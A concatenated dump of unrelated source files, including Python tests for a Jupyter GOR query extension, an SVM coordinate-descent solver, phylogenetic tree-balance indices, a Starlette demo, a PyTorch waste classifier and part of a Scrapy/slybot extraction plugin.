os.environ[\"NEXTCODE_PROFILE\"] = \"notfound\"\n with self.assertRaises(InvalidProfile):\n jupyter.get_service()\n\n del os.environ[\"NEXTCODE_PROFILE\"]\n os.environ[\"GOR_API_KEY\"] = REFRESH_TOKEN\n jupyter.get_service()\n del os.environ['GOR_API_KEY']\n\n @responses.activate\n def test_replace_vars(self):\n setup_responses()\n ret = self.magics.replace_vars(\"hello $not_found;\")\n self.assertIn(\"$not_found\", ret)\n self.magics.shell.user_ns = {\"found\": 1}\n string = self.magics.replace_vars(\"hello $found;\")\n self.assertEqual(\"hello 1;\", string)\n\n self.magics.shell.user_ns = {\"s\": 6}\n string = self.magics.replace_vars(\"hello $s;\")\n self.assertEqual(\"hello 6;\", string)\n\n string = self.magics.replace_vars(\"hello $1;\")\n self.assertEqual(\"hello $1;\", string)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_load_relations(self):\n with self.assertRaises(Exception) as ex:\n _ = self.magics.load_relations([\"[not_found]\"])\n self.assertIn(\"Variable 'not_found' not found\", str(ex.exception))\n\n self.magics.shell.user_ns = {\"found\": 1}\n with self.assertRaises(Exception) as ex:\n string = self.magics.load_relations([\"var:found\", \"var:alsofound\"])\n self.assertIn(\"found must be a pandas DataFrame object\", str(ex.exception))\n\n self.magics.shell.user_ns = {\"found\": DataFrame(), \"alsofound\": DataFrame()}\n _ = self.magics.load_relations([\"var:found\", \"var:alsofound\"])\n\n def test_print_error(self):\n jupyter.print_error(\"test\")\n\n def test_load_extension(self):\n setup_responses()\n m = MagicMock()\n with mock.patch(\"nextcode.services.query.jupyter.get_service\"):\n jupyter.load_ipython_extension(m)\n\n with mock.patch(\n \"nextcode.services.query.jupyter.get_service\", side_effect=InvalidToken\n ):\n jupyter.load_ipython_extension(m)\n\n with mock.patch(\n \"nextcode.services.query.jupyter.get_service\",\n side_effect=ServerError(\"Error\"),\n ):\n jupyter.load_ipython_extension(m)\n\n\nclass GorCommandTest(JupyterTest):\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_singleline_queryservice(self):\n setup_responses()\n df = self.magics.gor(\"--queryservice True Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"--queryservice True Hello\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_singleline_queryserver(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.num_lines = 100\n m.dataframe.return_value = pd.DataFrame()\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_queryserver\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n def test_not_done(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_multiline_queryservice(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 999999999\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"--queryservice True Hello\", \"World\\nAnother world\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_multiline_queryserver(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.dataframe.return_value = pd.DataFrame()\n m.num_lines = 999999\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_queryserver\", return_value=m):\n df = self.magics.gor(\"Hello\", \"World\\nAnother world\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n def test_operator(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"myvar <<\", \"gor #dbsnp#\\nAnother line\")\n self.assertTrue(df is None)\n df = self.magics.gor(\"user_data/file.gorz <<\", \"gor #dbsnp#\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_download(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"file:myfile <<\", \"gor #dbsnp#\\nAnother line\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_relations(self):\n setup_responses()\n m = MagicMock()\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute.side_effect = MissingRelations(relations=[\"a\", \"b\"])\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_keyboard_interrupt(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.wait.side_effect = KeyboardInterrupt\n m.cancel.side_effect = QueryError(\"\")\n m.running.return_value = True\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_gorls(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n m.get_results.return_value = {\n \"data\": [\n [\"folder\", \"true\", 0],\n [\"file\", \"false\", 1234512345],\n [\"file\", \"false\", 1234512345678],\n [\"file\", \"false\", 0],\n ]\n }\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n _ = self.magics.gorls(\". test\")\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_gorfind(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n m.get_results.return_value = {\n \"data\": [\n [\"/project/folder\"],\n [\"/project/file\"],\n [\"/project/file\"],\n [\"/project/file\"],\n ]\n }\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n m.project = \"/project/\"\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n _ = self.magics.gorfind(\"test\")\n\n def test_print(self):\n jupyter.print_details(\"dummy\")\n os.environ[\"LOG_QUERY\"] = \"1\"\n jupyter.print_details(\"dummy\")\n os.environ[\"LOG_QUERY\"] = \"\"\n\n def test_query_builder(self):\n qry = jupyter.QueryBuilder()\n qry.defs[\"asdf\"] = \"def\"\n qry.defs[\"ghjk\"] = \"def;\"\n qry.creates[\"qwer\"] = \"create\"\n qry.creates[\"tyu\"] = \"create;\"\n qry.render(\"gor #dbsnp#\")\n m = MagicMock()\n m.project = \"/project/\"\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n qry.execute(\"gor #dbsnp#\")\n\n def test_sizeof_fmt(self):\n txt = jupyter.sizeof_fmt(1)\n self.assertEqual(txt, \"1.0B\")\n\n txt = jupyter.sizeof_fmt(0)\n self.assertEqual(txt, \"-\")\n\n txt = jupyter.sizeof_fmt(1024 * 1024)\n self.assertEqual(txt, \"1.0MiB\")\n\n txt = jupyter.sizeof_fmt(1024 * 1024 * 1024 * 1024)\n self.assertEqual(txt, \"1.0TiB\")\n\n txt = jupyter.sizeof_fmt(\n 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024\n )\n self.assertIn(\"Yi\", txt)\n","sub_path":"tests/test_jupyter.py","file_name":"test_jupyter.py","file_ext":"py","file_size_in_byte":12470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"195542487","text":"# using this function, I preprocess the titanic dataset\n# NOTICE: I intentionally did not use this function in my fisrt mission (main.py)\n\ndef preprocess(titanic):\n\n # handling missing values\n\n titanic[\"Age\"] = titanic[\"Age\"].fillna(titanic[\"Age\"].median())\n\n # converting a non-numeric value to a numeric value\n # 0 = male, 1 = female\n titanic.loc[titanic[\"Sex\"] == \"male\", \"Sex\"] = 0\n titanic.loc[titanic[\"Sex\"] == \"female\", \"Sex\"] = 1\n\n titanic[\"Embarked\"] = titanic[\"Embarked\"].fillna(\"S\")\n titanic.loc[titanic[\"Embarked\"] == \"S\", \"Embarked\"] = 0\n titanic.loc[titanic[\"Embarked\"] == \"C\", \"Embarked\"] = 1\n titanic.loc[titanic[\"Embarked\"] == \"Q\", \"Embarked\"] = 2\n\n titanic[\"Fare\"] = titanic[\"Fare\"].fillna(titanic[\"Fare\"].median())\n\n return titanic;","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"189353738","text":"import numpy as np\r\nimport random as rnd\r\nimport time as tm\r\nfrom matplotlib import pyplot as plt\r\nimport math\r\n\r\n# These are for 10 seconds\r\n# eta = 0.0007 , sq : 5400 , random\r\n# 0.0008 , sq, 5491 , random\r\n# 0.0008 , sq, 5415 , cyclic\r\n# 0.0007 , sq, 5458 , cyclic\r\n# 0.0009 , sq, 5384 , cyclic\r\n# 0.00095 , sq, 5366 , cyclic\r\n# 0.001 , sq, 5361 , cyclic\r\n# 0.002 , sq, 5436 , cyclic\r\n# 0.0015 , sq, 5307 , cyclic\r\n# 0.0016 , sq, 5289 , cyclic\r\n# 0.00165 , sq, 5283 , cyclic //Not working now\r\n# 0.00165 , sq, 5279 , random\r\n# Random is sometimes giving good answers but sometimes it is horrible\r\n# 0.00003, -, 5252, cyclic\r\n# 0.00005. -, 5234, cyclic\r\n# 0.00007. -, 5224, cyclic\r\n# 0.000072. -, 5224, cyclic\r\n\r\n\r\n# 0.00165 , sq, 5250 , random cyclic\r\n# 0.00007 , - , 5228 , random cyclic\r\n\r\n\r\ndef getCyclicCoord( currentCoord, d ):\r\n\tif currentCoord >= d-1:\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn currentCoord + 1\r\n\r\ndef getRandCoord( d ):\r\n\treturn rnd.randint( 0, d-1 )\r\n\r\nrandpermInner = -1\r\n\r\ndef getRandpermCoord( currentCoord, d ):\r\n# \t# samples = rnd.sample( range(0, d), B )\r\n# \t# return samples\r\n\tglobal randperm, randpermInner\r\n\tif randpermInner >= d-1 or randpermInner < 0 or currentCoord < 0:\r\n\t\trandpermInner = 0\r\n\t\trandperm = np.random.permutation( d )\r\n\t\treturn randperm[randpermInner]\r\n\telse:\r\n\t\trandpermInner = randpermInner + 1\r\n\t\treturn randperm[randpermInner]\r\n\r\ndef batch_grad(theta, C, X, y, j):\r\n\t(n, d) = X.shape\r\n\tX_ = X\r\n\ty_ = y\r\n\tdiscriminant = np.multiply((X_.dot(theta)), y_)\r\n\tg = np.zeros( (n,) )\r\n\tg[discriminant < 1] = -1\r\n\treturn theta[j] + C * 2 * (g * (X_.T[j,:])).dot(np.multiply(y_, (1 - discriminant)))\r\n\r\ndef getObj( X, y, theta, C):\r\n\tw = theta[0:-1]\r\n\thingeLoss = np.maximum( 1 - np.multiply( (X.dot( theta )), y ), 0 )\r\n\treturn 0.5 * w.dot( w ) + C * hingeLoss.dot( hingeLoss )\r\n\r\n\r\ndef solver( X, y, C, timeout, spacing ):\r\n\t\r\n\t(n, d) = X.shape\r\n\tX = np.c_[X, np.ones(n)]\r\n\td = d + 1\r\n\tt = 0\r\n\ttotTime = 0\r\n\ttotalTime = 0\r\n\r\n\t# w is the normal vector and b is the bias\r\n\t# These are the variables that will get returned once timeout happens\r\n\t# w = np.zeros( (d-1,) )\r\n\t# b = 0\r\n\ttic = tm.perf_counter()\r\n\r\n\ttheta = np.zeros( (d,) )\r\n\tcumulative = theta\r\n\tw = theta[0:-1]\r\n\tb = theta[-1]\r\n\teta = 0.00007\r\n\t# B = 5\r\n\tj = -1\r\n\t# global randpermInner randperm\r\n\t\r\n\t# randperm = np.random.permutation( d )\r\n\r\n\tobj_SGD = np.array([getObj(X, y, theta, C)])\r\n\ttime_SGD = np.array([0])\r\n\r\n\ttic1 = tm.perf_counter()\r\n\twhile True:\r\n\t\tt = t + 1\r\n\t\tif t % spacing == 0:\r\n\t\t\ttoc = tm.perf_counter()\r\n\t\t\ttotTime = totTime + (toc - tic)\r\n\t\t\tif totTime > timeout:\r\n\r\n\t\t\r\n\t\t\t\tprint(getObj(X, y, theta, C), t)\r\n\t\t\t\t# print(t)\r\n\t\t\t\treturn (w, b, totTime)\r\n\t\t\telse:\r\n\t\t\t\ttic = tm.perf_counter()\r\n\t\t\r\n\r\n\t\tthetanew = theta\r\n\t\tj = getCyclicCoord(j, d)\r\n\t\t# j = getRandCoord(d)\r\n\t\t# j = getRandpermCoord(j, d)\r\n\r\n\t\tthetanew[j] = theta[j] - (batch_grad(theta, C, X, y, j) * (eta)) \r\n\t\ttheta = thetanew\r\n\r\n\t\ttoc1 = tm.perf_counter()\r\n\r\n\t\t# cumulative = cumulative + theta\r\n\t\tw = theta[0:-1]\r\n\t\tb = theta[-1]\r\n\r\n\treturn (w, b, totTime) # This return statement will never be reached\r\n\r\n# C = 1","sub_path":"Assignment1/assn1/SGD_P1.py","file_name":"SGD_P1.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"196532916","text":"from functools import lru_cache\nfrom math import factorial\n\nfrom biotrees.shape import Shape\nfrom biotrees.shape.iso import isomorphic\n\nfrom biotrees.util import binom2\n\n\n\ndef is_symmetric(t):\n \"\"\"\n Returns True if the root of t is a symmetric node, and False otherwise. If t is a leaf, it returns True:\n ex falso quodlibet.\n :return: `bool` instance.\n \"\"\"\n return t.is_leaf() or \\\n all(isomorphic(t.children[0], ch) for ch in t.children[1:])\n\ndef count_symmetries(t):\n \"\"\"\n Returns the number of symmetric interior nodes in t.\n :return: `int` instance.\n \"\"\"\n if t.is_leaf():\n return 0\n else:\n return int(is_symmetric(t)) + sum(count_symmetries(ch) for ch in t.children)\n\ndef count_automorphisms(t):\n if t.is_leaf():\n return 1\n\n aut = 1\n cur_sym_class_rep = None\n cur_sym_class_aut = 1\n cur_sym_class_len = 1\n\n # def iter_len(it):\n # return sum(1 for _ in it)\n\n # def node_aut(child, iso_class):\n # iso_class_len = iter_len(iso_class)\n # return count_automorphisms(child)**iso_class_len * factorial(iso_class_len)\n\n # return prod(starmap(node_aut, groupby(t.children)))\n\n for i in range(len(t.children)):\n ti = t.children[i]\n\n if cur_sym_class_rep is None or not isomorphic(cur_sym_class_rep, ti):\n aut *= cur_sym_class_aut**cur_sym_class_len * factorial(cur_sym_class_len)\n\n cur_sym_class_rep = ti\n cur_sym_class_aut = count_automorphisms(ti)\n cur_sym_class_len = 1\n else:\n cur_sym_class_len += 1\n\n aut *= cur_sym_class_aut**cur_sym_class_len * factorial(cur_sym_class_len)\n return aut\n\n\ndef sackin_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n sackins, kappas = zip(*map(go, t.children))\n node_kappa = sum(kappas)\n node_sackin = sum(sackins) + node_kappa\n return node_sackin, node_kappa\n\n return go(tree)[0]\n\n\ndef binary_colless_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n left, right = t.children\n (cil, nl), (cir, nr) = go(left), go(right)\n return abs(nl - nr) + cil + cir, nl + nr\n\n return go(tree)[0]\n\n\ndef cophenetic_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n cophs, kappas = zip(*map(go, t.children))\n kappa = sum(kappas)\n coph = binom2(kappa) + sum(cophs)\n return coph, kappa\n\n if tree.is_leaf():\n return 0\n else:\n return sum(go(ch)[0] for ch in tree.children)\n\n\ndef binary_quartet_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n ts = t.children\n quartets, kappas = zip(*map(go, ts))\n kappa = sum(kappas)\n\n if kappa < 4:\n return 0, kappa\n\n s0 = sum(quartets)\n\n s3 = sum(binom2(kappas[i1]) * binom2(kappas[i2])\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n return s0+s3, kappa\n\n return go(tree)[0]\n\n\n@lru_cache(maxsize=1)\ndef get_quartets():\n q0 = Shape([Shape.LEAF, Shape([Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF])])])\n q1 = Shape([Shape.LEAF, Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF])])\n q2 = Shape([Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF])])\n q3 = Shape([Shape([Shape.LEAF, Shape.LEAF]), Shape([Shape.LEAF, Shape.LEAF])])\n q4 = Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF, Shape.LEAF])\n return [q0, q1, q2, q3, q4]\n\n\ndef quartet_index(tree, vs = range(5)):\n Q = get_quartets()\n t0 = Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF])\n\n def go(t):\n if t.is_leaf():\n return 0, 0, 1\n\n ts = t.children\n quartets, triples, kappas = zip(*map(go, ts))\n kappa = sum(kappas)\n\n if kappa < 3:\n triple = 0\n elif isomorphic(t, t0):\n triple = 1\n else:\n t_s0 = sum(triples)\n\n t_s1 = sum(kappas[i1] * kappas[i2] * kappas[i3]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts)))\n\n triple = t_s0 + t_s1\n\n if kappa < 4:\n return 0, triple, kappa\n\n for q, v in zip(Q, vs):\n if isomorphic(t, q):\n return v, triple, kappa\n\n s0 = sum(quartets)\n\n s1 = sum(binom2(kappas[i1]) * kappas[i2] * kappas[i3] +\n binom2(kappas[i2]) * kappas[i1] * kappas[i3] +\n binom2(kappas[i3]) * kappas[i1] * kappas[i2]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts)))\n\n s2 = sum(kappas[i1] * triples[i2] + kappas[i2] * triples[i1]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n s3 = sum(binom2(kappas[i1]) * binom2(kappas[i2])\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n s4 = sum(kappas[i1] * kappas[i2] * kappas[i3] * kappas[i4]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts))\n for i4 in range(i3+1, len(ts)))\n\n return s0 + vs[1]*s1 + vs[2]*s2 + vs[3]*s3 + vs[4]*s4, triple, kappa\n\n return go(tree)[0]\n","sub_path":"biotrees/shape/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"501767679","text":"#Creo e inicializo las variables\nimport time\nnum = 0\n\n#Pregunto un número para la cuenta atrás\nnum = int(input(\"Dime un número para la cuenta atrás:\\n\"))\n\n#Se inicia la cuenta atrás\nfor i in range(1,num):\n\tprint (num-i)\n\t#Paramos el tiempo 0.5s\n\ttime.sleep(0.5)\n\n#Indicar que el cohete a despegado\nprint (\"¡¡El cohete a despegado!!\")","sub_path":"canas-vidaller-manuel/Ejercicio_4.py","file_name":"Ejercicio_4.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"100577445","text":"from starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import PlainTextResponse\nfrom starlette.routing import Mount, Route, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\n\n\ndef homepage(request: Request):\n return PlainTextResponse(\"Hello, world!\")\n\n\ndef user_me(request: Request):\n username = \"John Doe\"\n return PlainTextResponse(\"Hello, %s!\" % username)\n\n\ndef user(request: Request):\n username = request.path_params[\"username\"]\n return PlainTextResponse(\"Hello, %s!\" % username)\n\n\nasync def websocket_endpoint(websocket):\n await websocket.accept()\n await websocket.send_text(\"Hello, websocket!\")\n await websocket.close()\n\n\ndef startup():\n print(1111)\n print(\"Ready to go\")\n\n\nasync def startup2():\n print(222)\n print(\"Ready to go222\")\n\n\ndef shutdown():\n print(\"The end\")\n\n\nroutes = [\n Route(\"/\", homepage),\n Route(\"/user/me\", user_me),\n Route(\"/user/{username}\", user), # /user/me\n WebSocketRoute(\"/ws\", websocket_endpoint),\n Mount(\"/static\", StaticFiles(directory=\"static\")),\n]\n\napp = Starlette(\n debug=True,\n routes=routes,\n on_startup=[startup, startup2],\n on_shutdown=[shutdown],\n)\n\n\n# app()\n","sub_path":"asyncio/youtuoo/async_demos/s2/s12.py","file_name":"s12.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601678241","text":"import torch\nfrom torchvision import transforms, datasets, models\nfrom PIL import Image\nfrom pathlib import Path\nimport sys\nimport os\nfrom gtts import gTTS\nimport mpg123\nfrom torch.autograd import Variable\n\nmodel = torch.load(\"wastemodel.pt\")\n\nloader = transforms.Compose([transforms.Resize(224), transforms.ToTensor()])\n\nimage = Image.open(Path(\"temp.jpg\"))\n\nimage = loader(image).float()\n\nimage = Variable(image, requires_grad=True)\n\nimage = image.unsqueeze(0)\n\noutput = model(image)\n\nprint(output)\nprediction = (int)(torch.max(output.data, 1)[1].numpy())\nprint(prediction)\n\nif (prediction == 0):\n t (\"Recycle that cardboard please!\")\nif (prediction == 1):\n t = \"Recycle that glass please!\"\nif (prediction == 2):\n t = \"Recycle that metal please!\"\nif (prediction == 3):\n t = (\"Recycle that paper please!\")\nif (prediction == 4):\n t = (\"Recycle that plastic please\")\nif (prediction ==5):\n t = \"Throw that away!\"\n\nmyobj = gTTS(text=t,lang='en',slow=False)\n\nmyobj.save(\"audiotemp.mp3\")\nos.system(\"mpg123 audiotemp.mp3\")\n\nos.remove(\"temp.jpg\")\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86525833","text":"from __future__ import absolute_import\n\nimport re\n\nfrom collections import OrderedDict\n\nfrom scrapy.http import Request\n\nfrom scrapely.extraction import InstanceBasedLearningExtractor\nfrom scrapely.htmlpage import HtmlPage, dict_to_page\n\nfrom slybot.linkextractor import (HtmlLinkExtractor, SitemapLinkExtractor,\n PaginationExtractor)\nfrom slybot.linkextractor import create_linkextractor_from_specs\nfrom slybot.item import SlybotItem, create_slybot_item_descriptor\nfrom slybot.extractors import apply_extractors\nfrom slybot.utils import htmlpage_from_response, include_exclude_filter\nXML_APPLICATION_TYPE = re.compile('application/((?P[a-z]+)\\+)?xml').match\n\nfrom .extraction import SlybotIBLExtractor\n\n\nclass Annotations(object):\n \"\"\"\n Base Class for adding plugins to Portia Web and Slybot.\n \"\"\"\n\n def setup_bot(self, settings, spec, items, extractors):\n \"\"\"\n Perform any initialization needed for crawling using this plugin\n \"\"\"\n _item_template_pages = sorted((\n [t.get('scrapes'), dict_to_page(t, 'annotated_body'),\n t.get('extractors', [])]\n for t in spec['templates'] if t.get('page_type', 'item') == 'item'\n ))\n self.item_classes = {}\n self.html_link_extractor = HtmlLinkExtractor()\n for schema_name, schema in items.items():\n if schema_name not in self.item_classes:\n if not schema.get('name'):\n schema['name'] = schema_name\n item_cls = SlybotItem.create_iblitem_class(schema)\n self.item_classes[schema_name] = item_cls\n\n # Create descriptors and apply additional extractors to fields\n page_descriptor_pairs = []\n for default, template, template_extractors in _item_template_pages:\n descriptors = OrderedDict()\n for schema_name, schema in items.items():\n item_descriptor = create_slybot_item_descriptor(schema,\n schema_name)\n apply_extractors(item_descriptor, template_extractors,\n extractors)\n descriptors[schema_name] = item_descriptor\n descriptor = descriptors.values() or [{}]\n descriptors['#default'] = descriptors.get(default, descriptor[0])\n page_descriptor_pairs.append((template, descriptors))\n\n self.extractors = SlybotIBLExtractor(page_descriptor_pairs)\n\n # generate ibl extractor for links pages\n _links_pages = [dict_to_page(t, 'annotated_body')\n for t in spec['templates']\n if t.get('page_type') == 'links']\n _links_item_descriptor = create_slybot_item_descriptor({'fields': {}})\n self._links_ibl_extractor = InstanceBasedLearningExtractor(\n [(t, _links_item_descriptor) for t in _links_pages]) \\\n if _links_pages else None\n\n self.build_url_filter(spec)\n\n def handle_html(self, response, seen=None):\n htmlpage = htmlpage_from_response(response)\n items, link_regions = self.extract_items(htmlpage)\n htmlpage.headers['n_items'] = len(items)\n try:\n response.meta['n_items'] = len(items)\n except AttributeError:\n pass # response not tied to any request\n for item in items:\n yield item\n for request in self._process_link_regions(htmlpage, link_regions):\n yield request\n\n def extract_items(self, htmlpage):\n \"\"\"This method is also called from UI webservice to extract items\"\"\"\n return self._do_extract_items_from(htmlpage, self.extractors)\n\n def _do_extract_items_from(self, htmlpage, extractor):\n extracted_data, template = extractor.extract(htmlpage)\n link_regions = []\n for ddict in extracted_data or []:\n link_regions.extend(ddict.pop(\"_links\", []))\n descriptor = template.descriptor() if template is not None else None\n items = []\n item_cls_name = descriptor.name if descriptor is not None else ''\n item_cls = self.item_classes.get(item_cls_name)\n for processed_attributes in extracted_data or []:\n if processed_attributes.get('_type') in self.item_classes:\n _type = processed_attributes['_type']\n item = self.item_classes[_type](processed_attributes)\n item['_type'] = item.display_name()\n elif item_cls:\n item = item_cls(processed_attributes)\n item['_type'] = item_cls_name\n else:\n item = dict(processed_attributes)\n item['url'] = htmlpage.url\n item['_template'] = str(template.id)\n items.append(item)\n\n return items, link_regions\n\n def build_url_filter(self, spec):\n \"\"\"make a filter for links\"\"\"\n respect_nofollow = spec.get('respect_nofollow', True)\n\n if spec.get(\"links_to_follow\") == \"none\":\n url_filterf = lambda x: False\n elif spec.get(\"links_to_follow\") == \"all\":\n if respect_nofollow:\n url_filterf = lambda x: x.nofollow\n else:\n url_filterf = lambda x: True\n else: # patterns\n patterns = spec.get('follow_patterns')\n excludes = spec.get('exclude_patterns')\n pattern_fn = include_exclude_filter(patterns, excludes)\n\n if respect_nofollow:\n url_filterf = lambda x: not x.nofollow and pattern_fn(x.url)\n else:\n url_filterf = lambda x: pattern_fn(x.url)\n\n self.url_filterf = url_filterf\n\n\n def _filter_link(self, link, seen):\n url = link.url\n if self.url_filterf(link):\n # filter out duplicate urls, later we should handle link text\n if url not in seen:\n seen.add(url)\n request = Request(url)\n if link.text:\n request.meta['link_text'] = link.text\n return request\n\n def _process_link_regions(self, htmlpage, link_regions):\n \"\"\"Process link regions if any, and generate requests\"\"\"\n if link_regions:\n for link_region in link_regions:\n htmlregion = HtmlPage(htmlpage.url, htmlpage.headers,\n link_region, encoding=htmlpage.encoding)\n for request in self._requests_to_follow(htmlregion):\n yield request\n else:\n for request in self._requests_to_follow(htmlpage):\n yield request\n\n def _requests_to_follow(self, htmlpage):\n if self._links_ibl_extractor is not None:\n extracted = self._links_ibl_extractor.extract(htmlpage)[0]\n if extracted:\n extracted_regions = extracted[0].get('_links', [])\n seen = set()\n for region in extracted_regions:\n htmlregion = HtmlPage(htmlpage.url, htmlpage.headers,\n region, encoding=htmlpage.encoding)\n for request in self._request_to_follow_from_region(\n htmlregion):\n if request.url in seen:\n continue\n seen.add(request.url)\n yield request\n else:\n for request in self._request_to_follow_from_region(htmlpage):\n yield request\n\n def _request_to_follow_from_region(self, htmlregion):\n seen = set()\n for link in self.html_link_extractor.links_to_follow(htmlregion):\n request = self._filter_link(link, seen)\n if request is not None:\n yield request\n\n def handle_xml(self, response, seen):\n _type = XML_APPLICATION_TYPE(response.headers.get('Content-Type', ''))\n _type = _type.groupdict()['type'] if _type else 'xml'\n try:\n link_extractor = create_linkextractor_from_specs({\n 'type': _type, 'value': ''\n })\n except ValueError:\n link_extractor = SitemapLinkExtractor()\n for link in 